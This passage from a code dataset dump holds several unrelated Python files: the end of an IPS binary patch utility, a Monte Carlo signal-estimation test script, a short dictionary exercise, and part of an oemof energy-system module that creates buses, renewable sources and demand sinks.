and self.rle_size:\n raise ValueError(\"RLE records may only contain one byte of content, \"\n \"%d bytes provided\" % len(content))\n self.content = bytearray(content)\n except TypeError:\n self.content = bytearray((content,))\n\n def size(self):\n if self.rle_size:\n return self.rle_size\n if self.content:\n return len(self.content)\n else:\n return 0\n\n def encode(self):\n if self.rle_size: #RLE record\n return struct.pack('>BHHHB', self.address >> 16, self.address & 0xffff, 0,\n self.rle_size, int(self.content[0]))\n return struct.pack('>BHH' + 'B' * self.size(), self.address >> 16, \n self.address & 0xffff, self.size(), *[int(b) for b in self.content])\n\n def apply(self, orig_content):\n size = self.size()\n if self.rle_size:\n orig_content[self.address:self.address+size] = self.content * size\n elif size:\n orig_content[self.address:self.address+size] = self.content\n \n \ndef main():\n parser = argparse.ArgumentParser(prog=\"ips\",\n description=\"A utility for creating and appying IPS patches\")\n parser.add_argument(\"-o\",\"--output\", type=str,\n help=\"The file name to be written.\")\n parser.add_argument(\"file1\", help=\"The first input file\")\n parser.add_argument(\"file2\", help=\"The second input file\")\n args = parser.parse_args()\n\n patch_content = None\n\n file1 = open(args.file1, 'rb')\n file1_content = file1.read()\n file1.close()\n file2 = open(args.file2, 'rb')\n file2_content = file2.read()\n file2.close()\n\n if file1_content[:5] == b'PATCH':\n patch_content, patch_name = file1_content, args.file1\n file_content, file_name = file2_content, args.file2\n elif file2_content[:5] == b'PATCH':\n patch_content, patch_name = file2_content, args.file2\n file_content, file_name = file1_content, args.file1\n \n if patch_content:\n out = apply_ips(file_content, patch_content)\n if not args.output:\n try:\n patch_name_without_ext = patch_name[:patch_name.rindex('.')]\n except ValueError:\n patch_name_without_ext = patch_name\n try:\n ext = file_name[file_name.rindex('.'):]\n except ValueError:\n ext = '.patched'\n args.output = patch_name_without_ext + ext\n else:\n out = create_ips(file1_content, file2_content)\n if not args.output:\n args.output = args.file2 + '.ips'\n \n outfile = open(args.output, 'wb')\n outfile.write(out)\n outfile.close()\n\n\nif __name__ == \"__main__\":\n 
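# The module can also be used without the CLI; a minimal sketch with\n    # hypothetical file names:\n    #   with open('a.bin', 'rb') as f1, open('b.bin', 'rb') as f2:\n    #       data = create_ips(f1.read(), f2.read())\n    #   with open('a_to_b.ips', 'wb') as out:\n    #       out.write(data)\n    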
main()\n","sub_path":"legacy/ips.py","file_name":"ips.py","file_ext":"py","file_size_in_byte":5590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"363425704","text":"from context import parametric_analysis\nimport parametric_analysis.current_signal_model.signal_model as mdl\nimport parametric_analysis.current_signal_model.bounds as app_bnd\nimport parametric_analysis.nonlinear_signal_model.estimators as est\nimport parametric_analysis.nonlinear_signal_model.bounds as bnd\nimport parametric_analysis.monte_carlo.simulations as mc\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom copy import copy\n\nN=1000\nFe=1000\nL1=2\nL2=3\n\n# Construct Signal Model\nw=2*np.pi*np.array([50,4.3])/Fe\n\nL=L1+L2+1\na=np.array([0.1,0.3,1,0.2,0.5,0.1])\nphi=np.zeros(L)\ntheta=np.hstack((a*np.cos(phi),a*np.sin(phi)))\n\nsignal=mdl.Interharmonic_Current_Signal_Model(L1,L2,N=N,w=w,theta=theta,sigma2=0.1,Fe=Fe)\nsignal.setattr(\"SNR\",20)\n\n#show signal and spectrum\nsignal.plot()\nplt.figure()\nsignal.plot_spectrum()\nplt.show()\n\n#Construct estimator\nsignal_estimator=mdl.Interharmonic_Current_Signal_Model(L1,L2,Fe=Fe)\nsignal_estimator.estimator_w=est.ML_Estimator_w(copy(signal_estimator),w+0.001) # the signal model must be passed to the constructor since the ML estimator requires the knowledge of the get_H() method\n\n#Construct Bounds\nbound0=bnd.CRB_Bounds(signal)\nbound1=app_bnd.Interharmonic_CRB_Bounds(signal)\n\n#Construct Monte Carlo Estimation\nsimulation_config={\"object\":\"signal\",\"attribute\":\"N\", \"values\":np.arange(50,600,50)}\nmc_est=mc.Monte_Carlo_Estimation(simulation_config,signal,signal_estimator,[bound0,bound1],signal_attributes_short_list=[\"w\"],Ntest=100)\nmc_est.simulate()\nmc_est.plot()\n\nplt.show()\n","sub_path":"tests/test_estimation_MCSA.py","file_name":"test_estimation_MCSA.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"213511303","text":"import math\r\n\r\nclass Classe:\r\n def remove(self, dict):\r\n del dict['clodoaldo']\r\n print(f'RESULTADO = {dict}')\r\n\r\n \r\nresposta = Classe();\r\n\r\ndict = {'joao': 'pedreiro', 'maria': 'advogada', 'jose': 'telefonista', 'bianca': 'gerente', 'clodoaldo': 'piloto'}\r\nresposta.remove(dict)\r\n\r\n\r\n","sub_path":"Exer31.py","file_name":"Exer31.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"243803851","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Creates oemof energy system components.\n\n Functions for the creation of oemof energy system objects from a\n given set of object parameters.\n\n Contributors:\n\n - Christian Klemm - christian.klemm@fh-muenster.de\n - Gregor Becker - gb611137@fh-muenster.de\n\"\"\"\n\nfrom oemof import solph\nimport logging\nimport os\nimport pandas as pd\nfrom feedinlib import *\nimport demandlib.bdew as bdew\nimport datetime\nimport numpy\n\n\ndef buses(nodes_data: dict, nodes: list) -> dict:\n \"\"\"\n Creates bus objects.\n Creates bus objects with the parameters given in 'nodes_data' and\n adds them to the list of components 'nodes'.\n\n :param nodes_data: dictionary containing parameters of the buses\n to be created.\n The following parameters have to be provided:\n\n - label,\n - active,\n - excess,\n - shortage,\n - shortage costs,\n - excess costs\n :type nodes_data: dict\n :param nodes: list of components created before (can be 
empty)\n :type nodes: list\n\n :return busd: dictionary containing all buses created\n :rtype: dict\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # creates a list of buses\n busd = {}\n \n # Creates components, which are defined within the \"buses\"-sheet of\n # the original excel-file\n for i, b in nodes_data['buses'].iterrows():\n # Create a bus object for every bus, which is marked as \"active\"\n if b['active']:\n # creates an oemof-bus object\n bus = solph.Bus(label=b['label'])\n # adds the bus object to the list of components \"nodes\"\n nodes.append(bus)\n busd[b['label']] = bus\n # returns logging info\n logging.info(' ' + 'Bus created: ' + b['label'])\n \n # Create an sink for every bus, which is marked with\n # \"excess\"\n if b['excess']:\n # creates the oemof-sink object and\n # directly adds it to the list of components \"nodes\"\n inputs = {\n busd[b['label']]:\n solph.Flow(variable_costs=b['excess costs'],\n emission_factor=b[\n 'excess constraint costs'])}\n nodes.append(\n solph.Sink(\n label=b['label'] + '_excess',\n inputs=inputs))\n \n # Create a source for every bus, which is marked with\n # \"shortage\"\n if b['shortage']:\n # creates the oemof-source object and\n # directly adds it to the list of components \"nodes\"\n outputs = {\n busd[b['label']]:\n solph.Flow(\n variable_costs=b['shortage costs'],\n emission_factor=b[\n 'shortage constraint costs'])}\n nodes.append(\n solph.Source(\n label=b['label'] + '_shortage',\n outputs=outputs))\n # Returns the list of buses as result of the function\n return busd\n\n\nclass Sources:\n \"\"\"\n Creates source objects.\n\n\n #def create_source(self, so, timeseries_args, output):\n Creates an oemof source with fixed or unfixed timeseries\n\n There are four options for labeling source objects to be created:\n\n - 'commodity': a source with flexible time series\n - 'timeseries': a source with predefined time series\n - 'photovoltaic': a photovoltaic component\n - 'wind power': a wind power component\n\n :param nodes_data: dictionary containing parameters of sources\n to be created.The following data have to be\n provided:\n\n - 'label'\n - 'active'\n - 'fixed'\n - 'output'\n - 'technology'\n - 'variable costs / (CU / kWh)'\n - 'existing capacity / (kW)'\n - 'min.investment capacity / (kW)'\n - 'max.investment capacity / (kW)'\n - 'periodical costs / (CU / (kW a))'\n - 'non-convex investment'\n - 'Fix Investment Cost / (CU/a)'\n - 'Turbine Model (Windpower ONLY)'\n - 'Hub Height (Windpower ONLY)'\n - 'technology database(PV ONLY)'\n - 'inverter database(PV ONLY)'\n - 'Modul Model(PV ONLY)'\n - 'Inverter Model(PV ONLY)'\n - 'Azimuth(PV ONLY)'\n - 'Surface Tilt(PV ONLY)'\n - 'Albedo(PV ONLY)'\n - 'Altitude(PV ONLY)'\n - 'Latitude(PV ONLY)'\n - 'Longitude(PV ONLY)'\n :type nodes_data: dict\n :param busd: dictionary containing the buses of the energy system\n :type busd: dict\n :param nodes: list of components created before(can be empty)\n :type nodes: list\n :param filepath: path to .xlsx scenario-file containing a\n \"weather data\" sheet with timeseries for\n\n - \"dhi\"(diffuse horizontal irradiation)\n W / m ^ 2\n - \"dirhi\"(direct horizontal irradiance)\n W / m ^ 2\n - \"pressure\" in Pa\n - \"temperature\" in °C\n - \"windspeed\" in m / s\n - \"z0\"(roughness length) in m\n :type filepath: str\n\n Contributors:\n\n - Christian Klemm - christian.klemm@fh-muenster.de\n - Gregor Becker - gregor.becker@fh-muenster.de\n \"\"\"\n \n def create_source(self, so: dict, timeseries_args: dict, output=None):\n 
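# called by the technology-specific helpers below with prepared kwargs\n        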
\"\"\"\n Creates an oemof source with fixed or unfixed timeseries\n \n :param so: dictionary containing all information for the\n creation of an oemof source. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'output'\n - 'periodical costs'\n - 'min. investment capacity'\n - 'max. investment capacity'\n - 'existing capacity'\n - 'non-convex investment'\n - 'fix investment costs'\n - 'variable costs'\n :type so: dict\n :param timeseries_args: dictionary rather containing the\n 'fix-attribute' or the 'min-' and\n 'max-attribute' of a source\n :type timeseries_args: dict\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # output default\n if output is None:\n output = self.busd[so['output']]\n # set variables minimum, maximum and existing\n if str(so['input']) in ['0', 'None', 'none', 'nan']:\n minimum = so['min. investment capacity']\n maximum = so['max. investment capacity']\n existing = so['existing capacity']\n # set variables minimum, maximum and existing for solar thermal heat\n # sources\n else:\n minimum = so['min. investment capacity'] * \\\n so['Conversion Factor']\n maximum = so['max. investment capacity'] * \\\n so['Conversion Factor']\n existing = so['existing capacity'] * \\\n so['Conversion Factor']\n # Creates a oemof source and appends it to the nodes_sources\n # (variable of the create_sources-class) list\n self.nodes_sources.append(\n solph.Source(\n label=so['label'],\n outputs={output: solph.Flow(\n investment=solph.Investment(\n ep_costs=so[\n 'periodical costs'],\n periodical_constraint_costs=so[\n 'periodical constraint costs'],\n minimum=minimum,\n maximum=maximum,\n existing=existing,\n nonconvex=True if\n so['non-convex investment'] == 1\n else False,\n offset=so[\n 'fix investment costs']),\n **timeseries_args,\n variable_costs=so['variable costs'],\n emission_factor=so[\n 'variable constraint costs']\n )}\n ))\n \n def commodity_source(self, so: dict):\n \"\"\"\n Creates an oemof source object with flexible time series\n (no maximum or minimum) with the use of the create_source\n method.\n\n :param so: dictionary containing all information for the\n creation of an oemof source. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n :type so: object\n\n Christian Klemm - christian.klemm@fh-muenster.de\n\n \"\"\"\n # starts the create_source method with the parameters\n # min = 0 and max = 1\n self.create_source(so, {'min': 0, 'max': 1}, self.busd[so['output']])\n \n # Returns logging info\n logging.info(' ' + 'Commodity Source created: ' + so['label'])\n \n def timeseries_source(self, so: dict, time_series):\n \"\"\"\n Creates an oemof source object from a pre-defined\n timeseries with the use of the create_source method.\n\n :param so: dictionary containing all information for the\n creation of an oemof source. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'output'\n - 'periodical costs'\n - 'min. investment capacity'\n - 'max. 
investment capacity'\n - 'existing capacity'\n - 'non-convex investment'\n - 'fix investment costs'\n - 'variable costs'\n :type so: dict\n :param time_series: DataFrame containing the \"time_series\"\n sheet of the scenario file\n :type time_series: pandas.core.frame.DataFrame\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n \n if so['fixed'] == 1:\n # sets the timeseries attribute for a fixed source\n args = {'fix': time_series[so['label'] + '.fix'].tolist()}\n elif so['fixed'] == 0:\n # sets the timeseries attributes for an unfixed source\n args = {'min': time_series[so['label'] + '.min'].tolist(),\n 'max': time_series[so['label'] + '.max'].tolist()}\n else:\n raise SystemError(so['label'] + \" Error in fixed attribute\")\n \n # starts the create_source method with the parameters set before\n self.create_source(so, args, self.busd[so['output']])\n \n # Returns logging info\n logging.info(' ' + 'Timeseries Source created: ' + so['label'])\n\n def pv_source(self, so: dict, my_weather_pandas_dataframe):\n \"\"\"\n Creates an oemof photovoltaic source object.\n\n Simulates the yield of a photovoltaic system using feedinlib\n and creates a source object with the yield as time series,\n using the create_source method.\n\n :param so: dictionary containing all information for the\n creation of an oemof source. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'fixed'\n - 'Azimuth (PV ONLY)'\n - 'Surface Tilt (PV ONLY)'\n - 'Modul Model (PV ONLY)'\n - 'Inverter Model (PV ONLY)'\n - 'Albedo (PV ONLY)'\n - 'Latitude (PV ONLY)'\n - 'Longitude (PV ONLY)'\n :type so: dict\n :param my_weather_pandas_dataframe: DataFrame containing:\n \n - 'dirhi'\n - 'dhi'\n - 'temperature'\n - 'windspeed'\n :type my_weather_pandas_dataframe: pandas.core.frame.DataFrame\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # reads pv system parameters from the parameter dictionary\n # nodes_data\n parameter_set = {\n 'azimuth': so['Azimuth'],\n 'tilt': so['Surface Tilt'],\n 'module_name': so['Modul Model'],\n 'inverter_name': so['Inverter Model'],\n 'albedo': so['Albedo']}\n \n # sets pv system parameters for pv_module\n pv_module = powerplants.Photovoltaic(**parameter_set)\n \n # calculates global horizontal irradiance from diffuse (dhi)\n # and direct irradiance and adds it to the weather data frame\n my_weather_pandas_dataframe['ghi'] = \\\n (my_weather_pandas_dataframe.dirhi\n + my_weather_pandas_dataframe.dhi)\n \n # renames the data columns to the names required by the feedinlib\n # (DataFrame.rename returns a copy, so the result has to be\n # assigned back for the renaming to take effect)\n name_dc = {'temperature': 'temp_air', 'windspeed': 'v_wind'}\n my_weather_pandas_dataframe = \\\n my_weather_pandas_dataframe.rename(columns=name_dc)\n \n # calculates time series normed on 1 kW pv peak performance\n feedin = pv_module.feedin(\n weather=my_weather_pandas_dataframe,\n location=(so['Latitude'], so['Longitude']),\n scaling='peak_power')\n \n # Prepare data set for compatibility with oemof\n for i in range(len(feedin)):\n # Set negative values to zero\n # (requirement for solving the model)\n if feedin[i] < 0:\n feedin[i] = 0\n # Set values greater than 1 to 1\n # (requirement for solving the model)\n if feedin[i] > 1:\n feedin[i] = 1\n # Replace 'nan' values with 0\n feedin = feedin.fillna(0)\n if so['fixed'] == 1:\n # sets the attribute for a fixed pv_source\n args = {'fix': feedin}\n elif so['fixed'] == 0:\n # sets the attributes for an unfixed pv_source\n args = {'min': 0, 'max': feedin}\n else:\n raise SystemError(so['label'] + \" Error in fixed attribute\")\n \n # starts the create_source method with the parameters set 
before\n self.create_source(so, args, self.busd[so['output']])\n \n # returns logging info\n logging.info(' ' + 'Source created: ' + so['label'])\n\n def windpower_source(self, so: dict, weather_df_wind):\n \"\"\"\n Creates an oemof windpower source object.\n\n Simulates the yield of a windturbine using feedinlib and\n creates a source object with the yield as time series and the\n use of the create_source method.\n\n :param so: dictionary containing all information for the\n creation of an oemof source. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'fixed'\n - 'Turbine Model (Windpower ONLY)'\n - 'Hub Height (Windpower ONLY)'\n :type so: dict\n :param weather_df_wind: Dataframe containing:\n \n - 'windspeed'\n - 'temperature'\n - 'z0'\n - 'pressure'\n :type weather_df_wind: pandas.core.frame.Dataframe\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n \n # set up wind turbine using the wind turbine library.\n # The turbine name must correspond to an entry in the turbine\n # data-base of the feedinlib. Unit of the hub height is m.\n turbine_data = {\n 'turbine_type': so['Turbine Model'],\n 'hub_height': so['Hub Height']}\n wind_turbine = WindPowerPlant(**turbine_data)\n\n data_height = {'pressure': 0, 'temperature': 2, 'wind_speed': 10,\n 'roughness_length': 0}\n weather_df_wind = \\\n weather_df_wind[['windspeed', 'temperature', 'z0', 'pressure']]\n weather_df_wind.columns = \\\n [['wind_speed', 'temperature', 'roughness_length', 'pressure'],\n [data_height['wind_speed'], data_height['temperature'],\n data_height['roughness_length'], data_height['pressure']]]\n \n # calculate scaled feed-in\n feedin_wind_scaled = wind_turbine.feedin(\n weather=weather_df_wind, scaling='nominal_power')\n if so['fixed'] == 1:\n # sets the attribute for a fixed windpower_source\n args = {'fix': feedin_wind_scaled}\n \n elif so['fixed'] == 0:\n # sets the attribute for an unfixed windpower_source\n args = {'min': 0, 'max': feedin_wind_scaled}\n else:\n raise SystemError(so['label'] + \" Error in fixed attribute\")\n \n # starts the create_source method with the parameters set before\n self.create_source(so, args, self.busd[so['output']])\n \n # returns logging info\n logging.info(' ' + 'Source created: ' + so['label'])\n\n def solar_heat_source(self, so, data):\n \"\"\"\n Creates a solar thermal collector source object.\n\n Calculates the yield of a solar thermal flat plate collector\n or a concentrated solar power collector as time series by\n using oemof.thermal and the create_source method.\n\n The following key-value-pairs have to be included in the\n keyword arguments:\n\n :type so: dict\n :param so: has to contain the following keyword arguments\n\n - 'input'\n - 'technology':\n - 'solar_thermal_flat_plate' or\n - 'concentrated_solar_power'\n - 'Latitude'\n - 'Longitude'\n - 'Surface Tilt'\n - 'Azimuth'\n - 'Cleanliness'\n - 'ETA 0'\n - 'A1'\n - 'A2'\n - 'C1'\n - 'C2'\n - 'Temperature Inlet'\n - 'Temperature Difference'\n - 'Conversion Factor'\n - 'Peripheral Losses'\n - 'Electric Consumption'\n @ Yannick Wittor - yw090223@fh-muenster.de, 27.11.2020\n \"\"\"\n\n # import oemof.thermal in order to calculate collector heat output\n from oemof.thermal.solar_thermal_collector import flat_plate_precalc\n from oemof.thermal.concentrating_solar_power import csp_precalc\n import numpy\n\n # creates an oemof-bus object for solar thermal collector\n col_bus = solph.Bus(label=so['label'] + '_bus')\n # adds the bus object to the list of components \"nodes\"\n 
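# (Editorial sketch note, not from the original authors: the private
# collector bus created above decouples the raw collector yield from the
# heat network. The solph.Transformer appended at the end of this method
# couples this collector bus and the electricity input bus to the heat
# output bus; its conversion_factors apply the 'Peripheral Losses' and
# 'Electric Consumption' parameters, so that only the net usable heat
# reaches the output.)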
self.nodes_sources.append(col_bus)\n self.busd[so['label'] + '_bus'] = col_bus\n output = col_bus\n\n # import weather data and set datetime index with hourly frequency\n data.index.name = 'Datum'\n # TODO get frequency from energysystem sheet\n data = data.asfreq('h')\n\n # calculates global horizontal irradiance from diffuse (dhi)\n # and direct irradiance (dirhi) and adds it to the weather data frame\n data['ghi'] = (data[\"dirhi\"] + data[\"dhi\"])\n\n # precalculations for flat plate collectors, calculates total\n # irradiance on collector, efficiency and heat output\n if so['technology'] == 'solar_thermal_flat_plate':\n precalc_results = flat_plate_precalc(\n lat=so['Latitude'],\n long=so['Longitude'],\n collector_tilt=so['Surface Tilt'],\n collector_azimuth=so['Azimuth'],\n eta_0=so['ETA 0'],\n a_1=so['A1'],\n a_2=so['A2'],\n temp_collector_inlet=\n so['Temperature Inlet'],\n delta_temp_n=\n so['Temperature Difference'],\n irradiance_global=(data['ghi']),\n irradiance_diffuse=(data['dhi']),\n temp_amb=data['temperature'])\n # set variables collectors_heat and irradiance and conversion\n # from W/sqm to kW/sqm\n collectors_heat = precalc_results.collectors_heat/1000\n irradiance = precalc_results.col_ira/1000\n\n # set parameters for precalculations for concentrating solar power\n elif so['technology'] == 'concentrated_solar_power':\n # precalculation with parameter set, ambient temperature and\n # direct horizontal irradiance. Calculates total irradiance on\n # collector, efficiency and heat output\n precalc_results = csp_precalc(\n lat=so['Latitude'],\n long=so['Longitude'],\n collector_tilt=so['Surface Tilt'],\n collector_azimuth=so['Azimuth'],\n cleanliness = so['Cleanliness'],\n a_1=so['A1'],\n a_2 = so['A2'],\n eta_0=so['ETA 0'],\n c_1 = so['C1'],\n c_2 = so['C2'],\n temp_collector_inlet = so['Temperature Inlet'],\n temp_collector_outlet = so['Temperature Inlet']\n + so['Temperature Difference'],\n temp_amb=data['temperature'],\n E_dir_hor=data['dirhi'])\n \n # set variables collectors_heat and irradiance and conversion\n # from W/sqm to kW/sqm\n collectors_heat = precalc_results.collector_heat/1000\n irradiance = precalc_results.collector_irradiance/1000\n\n # set collector heat as timeseries as argument for source\n if so['fixed'] == 1:\n # sets the attribute for a fixed solar heat source\n args = {'fix': collectors_heat}\n elif so['fixed'] == 0:\n # sets the attributes for an unfixed solar heat source\n args = {'min': 0, 'max': collectors_heat}\n else:\n raise SystemError(so['label'] + \" Error in fixed attribute\")\n\n # starts the create_source method with the parameters set before\n self.create_source(so, args, output)\n\n self.nodes_sources.append(solph.Transformer(\n label=so['label'] + '_collector',\n inputs={self.busd[so['label'] + '_bus']:\n solph.Flow(variable_costs=0),\n self.busd[so['input']]: solph.Flow(variable_costs=0)},\n outputs={self.busd[so['output']]: solph.Flow(variable_costs=0)},\n conversion_factors={\n self.busd[so['label'] + '_bus']: 1,\n self.busd[so['input']]:\n so['Electric Consumption'] *\n (1 - so['Peripheral Losses']),\n self.busd[so['output']]:\n 1 - so['Peripheral Losses']\n }))\n\n # returns logging info\n logging.info(' ' + 'Source created: ' + so['label']\n + \", Max Heat power output per year and m²: {:2.2f}\".\n format(numpy.sum(collectors_heat)) + ' kWh/(m²a)'\n + \", Irradiance on collector per year and m²: \"\n \"{:2.2f}\".format(numpy.sum(irradiance)) + ' kWh/(m²a)')\n\n def __init__(self, nodes_data: dict, nodes: list, busd: dict,\n 
time_series, weather_data):\n \"\"\"\n Inits the source class\n ---\n Other variables:\n\n nodes_sources: obj:'list'\n -- class intern list of sources that are already created\n \"\"\"\n # Delete possible residues of a previous run from the class\n # internal list nodes_sources\n self.nodes_sources = []\n # Initialise a class intern copy of the bus dictionary\n self.busd = busd.copy()\n\n # Create Source from \"Sources\" Table\n for i, so in nodes_data['sources'].iterrows():\n # Create a source object for every source,\n # which is marked as \"active\"\n if so['active']:\n # Create Commodity Sources\n if so['technology'] == 'other':\n self.commodity_source(so)\n \n # Create Photovoltaic Sources\n elif so['technology'] == 'photovoltaic':\n self.pv_source(so, weather_data)\n \n # Create Windpower Sources\n elif so['technology'] == 'windpower':\n self.windpower_source(so, weather_data)\n \n # Create Time-series Sources\n elif so['technology'] == 'timeseries':\n self.timeseries_source(so, time_series)\n\n # Create flat plate solar thermal Sources\n elif so['technology'] in ['solar_thermal_flat_plate',\n 'concentrated_solar_power']:\n self.solar_heat_source(so, weather_data)\n \n # appends created sources and other objects to the list of nodes\n for i in range(len(self.nodes_sources)):\n nodes.append(self.nodes_sources[i])\n\n\nclass Sinks:\n \"\"\"\n Creates sink objects.\n \n There are four options for labeling source objects to be\n created:\n\n - unfixed: a source with flexible time series\n - timeseries: a source with predefined time series\n - SLP: a VDEW standard load profile component\n - richardson: a component with stochastically generated timeseries\n\n :param nodes_data: dictionary containing parameters of sinks to\n be created.The following data have to be\n provided:\n\n - 'label'\n - 'active'\n - 'fixed'\n - 'input'\n - 'load profile'\n - 'nominal value'\n - 'annual demand'\n - 'occupants [Richardson]'\n - 'building class'\n - 'wind class'\n :type nodes_data: dict\n :param busd: dictionary containing the buses of the energy system\n :type busd: dict\n :param nodes: list of components created before(can be empty)\n :type nodes: list\n :param filepath: path to .xlsx scenario-file containing a\n \"weather data\" sheet with timeseries for\n\n - \"dhi\"(diffuse horizontal irradiation)\n W / m ^ 2\n - \"dirhi\"(direct horizontal irradiance)\n W / m ^ 2\n - \"pressure\" in Pa\n - \"temperature\" in °C\n - \"windspeed\" in m / s\n - \"z0\"(roughness length) in m\n :type filepath: str\n\n Contributors:\n\n - Christian Klemm - christian.klemm@fh-muenster.de\n - Gregor Becker - gregor.becker@fh-muenster.de\n \"\"\"\n # intern variables\n busd = None\n nodes_sinks = []\n \n def create_sink(self, de: dict, timeseries_args: dict):\n \"\"\"\n Creates an oemof sink with fixed or unfixed timeseries.\n\n :param de: dictionary containing all information for the\n creation of an oemof sink. 
At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'input'\n\n :type de: dict\n :param timeseries_args: dictionary containing either the\n 'fix' attribute or the 'min' and\n 'max' attributes of a sink\n :type timeseries_args: dict\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # creates an oemof Sink and appends it to the class intern list\n # of created sinks\n self.nodes_sinks.append(\n solph.Sink(label=de['label'],\n inputs={\n self.busd[de['input']]:\n solph.Flow(**timeseries_args)}))\n \n def unfixed_sink(self, de: dict):\n \"\"\"\n Creates a sink object with an unfixed energy input, using\n the create_sink method.\n\n :param de: dictionary containing all information for the\n creation of an oemof sink. For this function the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'nominal value'\n :type de: dict\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n \n # set static inflow values\n inflow_args = {'nominal_value': de['nominal value']}\n # starts the create_sink method with the parameters set before\n self.create_sink(de, inflow_args)\n # returns logging info\n logging.info(' ' + 'Sink created: ' + de['label'])\n \n def timeseries_sink(self, de, nodes_data):\n \"\"\"\n Creates a sink object with a fixed or bounded input. The input\n must be given as a time series in the scenario file.\n In this context the method uses the create_sink method.\n\n :param de: dictionary containing all information for the\n creation of an oemof sink. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'nominal value'\n :type de: dict\n :param nodes_data: DataFrame containing the \"time_series\"\n sheet of the scenario file\n :type nodes_data: pandas.core.frame.DataFrame\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # sets the nominal value\n args = {'nominal_value': de['nominal value']}\n if de['fixed'] == 0:\n # sets the attributes for an unfixed time_series sink\n args.update({'min': nodes_data[de['label'] + '.min'].tolist(),\n 'max': nodes_data[de['label'] + '.max'].tolist()})\n elif de['fixed'] == 1:\n # sets the attributes for a fixed time_series sink\n args.update({'fix': nodes_data[de['label'] + '.fix'].tolist()})\n # starts the create_sink method with the parameters set before\n self.create_sink(de, args)\n \n # returns logging info\n logging.info(' ' + 'Sink created: ' + de['label'])\n \n def slp_sink(self, de: dict, nodes_data: dict, weather_data):\n \"\"\"\n Creates a sink with a residential or commercial\n SLP time series.\n \n Creates a sink with inputs according to VDEW standard\n load profiles, using oemof's demandlib.\n Used for the modelling of residential or commercial\n electricity demand.\n In this context the method uses the create_sink method.\n\n :param de: dictionary containing all information for the\n creation of an oemof sink. 
At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'load profile'\n - 'annual demand'\n - 'building class'\n - 'wind class'\n :type de: dict\n :param nodes_data: dictionary containing the scenario sheets;\n the \"energysystem\" sheet is used here\n :type nodes_data: dict\n :param weather_data: DataFrame containing the temperature\n timeseries required for the heat SLPs\n :type weather_data: pandas.core.frame.DataFrame\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n heat_slps = ['efh', 'mfh']\n heat_slps_commercial = \\\n ['gmf', 'gpd', 'ghd', 'gwa', 'ggb', 'gko', 'gbd', 'gba',\n 'gmk', 'gbh', 'gga', 'gha']\n electricity_slps = \\\n ['h0', 'g0', 'g1', 'g2', 'g3', 'g4', 'g5', 'g6', 'l0', 'l1', 'l2']\n # Importing timesystem parameters from the scenario\n ts = next(nodes_data['energysystem'].iterrows())[1]\n temp_resolution = ts['temporal resolution']\n periods = ts[\"periods\"]\n start_date = str(ts['start date'])\n \n # Converting start date into datetime format\n start_date = \\\n datetime.datetime.strptime(start_date, '%Y-%m-%d %H:%M:%S')\n \n # Create DataFrame (pd.datetime was removed in pandas >= 1.0,\n # so datetime.datetime is used here instead)\n demand = pd.DataFrame(\n index=pd.date_range(datetime.datetime(start_date.year,\n start_date.month,\n start_date.day,\n start_date.hour),\n periods=periods, freq=temp_resolution))\n # creates time series\n if de['load profile'] in heat_slps_commercial \\\n or de['load profile'] in heat_slps:\n # sets the parameters of the heat slps\n args = {'temperature': weather_data['temperature'],\n 'shlp_type': de['load profile'],\n 'wind_class': de['wind class'],\n 'annual_heat_demand': 1,\n 'name': de['load profile']}\n if de['load profile'] in heat_slps:\n # adds the building class, which is only necessary for\n # the non-commercial slps\n args.update(\n {'building_class': de['building class']})\n demand[de['load profile']] = bdew.HeatBuilding(\n demand.index, **args).get_bdew_profile()\n elif de['load profile'] in electricity_slps:\n year = datetime.datetime.strptime(str(ts['start date']),\n '%Y-%m-%d %H:%M:%S').year\n # Imports standard load profiles\n e_slp = bdew.ElecSlp(year)\n # TODO Discuss if this is right !!! ( dyn_function_h0 )\n demand = e_slp.get_profile({de['load profile']: 1})\n # creates time series based on standard load profiles\n demand = demand.resample(temp_resolution).mean()\n # sets the nominal value\n args = {'nominal_value': de['annual demand']}\n if de['fixed'] == 1:\n # sets the parameters for a fixed sink\n args.update({'fix': demand[de['load profile']]})\n elif de['fixed'] == 0:\n # sets the parameters for an unfixed sink\n args.update({'max': demand[de['load profile']]})\n # starts the create_sink method with the parameters set before\n self.create_sink(de, args)\n # returns logging info\n logging.info(' ' + 'Sink created: ' + de['label'])\n \n def richardson_sink(self, de: dict, nodes_data: dict, weather_data):\n \"\"\"\n Creates a sink with a stochastically generated timeseries.\n \n Creates a sink with stochastically generated input, using\n richardson.py. Used for the modelling of residential\n electricity demands. In this context the method uses the\n create_sink method.\n\n :param de: dictionary containing all information for\n the creation of an oemof sink. 
